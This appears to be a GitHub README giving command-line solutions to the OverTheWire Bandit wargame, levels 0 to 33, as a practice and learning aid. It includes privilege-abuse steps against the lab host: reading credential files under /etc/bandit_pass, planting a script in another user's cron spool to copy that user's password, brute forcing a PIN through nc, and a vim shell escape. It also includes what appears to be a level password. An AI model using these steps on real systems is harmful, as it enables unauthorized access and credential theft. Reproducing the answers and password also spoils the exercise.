Skip to content

zen29d/bandit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
README.md
README.md
 
 
bandit_key
bandit_key
 
 

Repository files navigation

bandit

< >: Replace

( ) : Read only

--> : Return key

Level Hint Command
level0 $ cat readme
level1 show dashed file $ cat ./-
level2 spaced file name $ cat 'spaces in this filename'
level3 hidden file $ cat inhere/.hidden
level4 find ascii file $ file ./* | grep ASCII
$ cat inhere/-file07
level5 find file with size $ ls -l $(find ./ -type f) | grep '1033'
$ cat inhere/maybehere07/.file2
level6 find file with user $ find / -print -ls | grep 'bandit7'
$ cat /var/lib/dpkg/info/bandit7.password
level7 find word $ cat data.txt | grep millionth
level8 find non-repeated $ sort data.txt | uniq -u
level9 find words $ strings data.txt | grep '='
level10 decode data $ base64 -d data.txt
levle11 decipher data $ cat data.txt | tr 'a-zA-Z' 'n-za-mN-ZA-M'
level12 convert, extract data $ xxd -r data.txt hello.bin
$ zcat hello.bin | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | zcat | file -
level13 save sshkey to host $ cat sshkey.private
(login level14: chmod 600 <sshkey> && ssh -i <sshkey> host@machine)
level14 telnet $ cat /etc/bandit_pass/bandit14 (show l14 key)
$ telnet localhost 30000 (--> paste l14 key)
level15 ssh with ssl $ openssl s_client -connect localhost:30001 (--> paste l15 key)
level16 find port, ssh ssl $ nmap -p31000-32000 localhost
$ openssl s_client -connect localhost:<port> (--> paste l16 key)
level17 find difference $ cat /etc/bandit_pass/bandit17 (show l17 key)
$ diff passwords.new passwords.old
level18 ssh with cmd $ ssh -p 2220 [email protected] cat readme
level19 exec as other user $ ./bandit20-do cat /etc/bandit_pass/bandit20
level20 two ssh $ nc -lp 1213 (--> paste l20 key)
$ ./suconnect 1213 (in other terminal)
level21 read script $ cat /etc/cron.d/cronjob_bandit22
$ cat /usr/bin/cronjob_bandit22.sh (show tmp_new_dir)
$ cat /tmp/<tmp_new_dir>
level22 read script $ cat /etc/cron.d/cronjob_bandit23
$ (echo I am user bandit23 | md5sum | cut -d ' ' -f 1) (generate tmp_new_dir)
$ cat /tmp/<tmp_new_dir>
level23 write script $ mkdir /tmp/<name>
$ chmod 777 /tmp/<name>
$ cat -e "#!/bin/bash \ncat /etc/bandit_pass/bandit24 > /tmp/<name>/pass" > job24.sh
$ cp job24.sh /var/spool/bandit24/
level24 telnet with bruteforce $ seq -f "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ %04g" 0000 9999 | nc localhost 30002
level25 $ ls (sshkey for l26)
(decrease the size of terminal before login to l26)
level26 vim (press v, type :set shell=/bin/bash -->, type :shell)
$ cat /etc/bandit_pass/bandit26
$ ./bandit27-do cat /etc/bandit_pass/bandit27
level27 git readme $ cd /tmp/
$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
$ cat repo/README
level28 git difference $ cd /tmp/
$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
$ git log -p
level29 git branch $ cd /tmp/
$ git clone ssh://bandit29-git@localhost/home/bandit29-git/repo
$ git branch -a
$ git checkout dev
$ cat README
level30 git read tag $ cd /tmp/
$ git clone ssh://bandit30-git@localhost/home/bandit30-git/repo
$ git tag
$ git show <tag_name>
level31 git push file $ cd /tmp/
$ git clone ssh://bandit31-git@localhost/home/bandit31-git/repo
$ echo 'May I come in?' >key.txt
$ git add key.txt
$ rm .gitignore
$ git commit -m 'key31'
$ git push
level32 $ $0
$ /bin/bash
$ cat /etc/bandit_pass/bandit33
level33 --FINISH

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors